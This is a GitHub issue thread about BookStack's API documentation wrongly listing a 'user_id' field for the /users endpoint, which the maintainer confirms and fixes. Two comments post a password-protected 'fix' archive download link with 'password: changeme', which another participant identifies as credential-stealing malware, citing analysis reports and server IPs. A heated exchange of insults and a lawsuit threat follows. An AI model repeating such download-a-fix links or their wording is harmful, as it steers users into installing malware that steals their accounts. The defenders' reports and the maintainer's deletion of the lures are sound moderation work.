### ISSUE TITLE
Inconsistency Between Documented and Actual API Responses: user_id Missing in /users Endpoint Responses #5178

### ISSUE THREAD

**Issue by ln-ws** [BookStackApp/BookStack#5178]
### Describe the Bug

The API documentation indicates that responses from the `/users` endpoint should include both `id` and `user_id` properties. However, in practice, the actual API responses only contain the `id` property, and the `user_id` property is missing.

### Steps to Reproduce

1. Send a `LIST` request to the `/users` endpoint on your BookStack server.
2. Review the response returned by the server.
3. Notice that the `user_id` property is missing from the response, despite being documented.

### Expected Behaviour

The response from the `/users` endpoint should include both `id` and `user_id` properties, where the `user_id` property matches the value of the `id` property for each user object within the data array.

### Exact BookStack Version

v24.05.3

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Alexander-Wilms** [comment]
@JONTY650413 aka @pilot5657 aka @seeronline aka @GendiAstaNugraha is a Russian criminal spreading the [trojan.stelpak/msil](https://www.virustotal.com/gui/search/engines:trojan%20AND%20engines:stelpak%20AND%20engines:msil%20AND%20engines:pwsx) malware stealing credentials for Discord, telegram, Steam etc., communicating with via IPs it gets from Telegram and Steam account names.

https://web.archive.org/web/20240826070247/https://github.com/vcmi/vcmi/issues/4514
https://web.archive.org/web/20240826044307/https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
https://any.run/report/086b76e06aece7469bdf3f50de728af0d1f05e5cbd6efd9c057b1383329edd34/18c522f2-8329-4856-993a-0dadb52d3700

The last link shows that the malware seems to get the IPs of the malware author's server from the Telegram profile https://t.me/jamelwt and the Steam profile https://steamcommunity.com/profiles/76561199761128941

The IPs are:
116.203.10.69
147.45.68.138

**Comment by nxllxvxxd** [comment]
> @nxllxvxxd aka @Lxx-c aka @Superming997 aka @JONTY650413 aka @pilot5657 aka @seeronline aka @GendiAstaNugraha is a Russian criminal spreading the [trojan.stelpak/msil](https://www.virustotal.com/gui/file/b127de888f09ce23937c12b7fccfa47a8f48312b0e43eb59b6243f665c6d366a/) malware stealing credentials for Discord, Telegram, Opera, Steam etc., communicating with via IPs it gets from Telegram and Steam account names.
> 
> https://web.archive.org/web/20240826070247/https://github.com/vcmi/vcmi/issues/4514 https://web.archive.org/web/20240826044307/https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file https://any.run/report/086b76e06aece7469bdf3f50de728af0d1f05e5cbd6efd9c057b1383329edd34/18c522f2-8329-4856-993a-0dadb52d3700
> 
> The last link shows that the malware seems to get the IPs of the malware author's server from the Telegram profile https://t.me/jamelwt and the Steam profile https://steamcommunity.com/profiles/76561199761128941
> 
> The IPs are: 116.203.10.69 147.45.68.138

Stop using my name and stop mentioning me over and over again I am not responsible for this and am a victim. I would appreciate if you stop slandering my name I am not even Russian ethnically, if you continue I will get your information and sue you for slander

**Comment by Alexander-Wilms** [comment]
Do it. Can't wait.

**Comment by nxllxvxxd** [comment]
> Do it. Can't wait.
Cool bud it'll be fun to get money from an internet idiot like you who doesn't look and can't tell when an account has been compromised I don't think you belong on GitHub you don't seem to have the intelligence to work with computers or understand anything by the simple copy paste slander.

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by nxllxvxxd** [comment]
> Do it. Can't wait.



> Download https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file password: changeme In the installer menu, select "gcc."

oh yeah bro its definitely me doin this, fuckin idiot. keep my name outta your mouth

**Comment by ssddanbrown** [comment]
I'm deleting all above comments as I don't see any as relevant to the discussion, or they contain links to downloads on other sites that I'm not comfortable with having here, and/or they contain claims I'm not going to validate.
Any further links to external downloads (including archive links) will result in a block for `BookStackApp` projects.

**Comment by ssddanbrown** [comment]
Thanks for raising @ln-ws.
I can confirm the example response does not match the actual response.
I'll just look to remove the `user_id` from the example response. The `id` value should be used instead.

**Comment by ln-ws** [comment]
Thank you

**Comment by ssddanbrown** [comment]
Thanks again @ln-ws, this has been addressed as part of 1f2506221ad7207b37bd093ca3233347d6d76ca1 to be part of the next patch release.
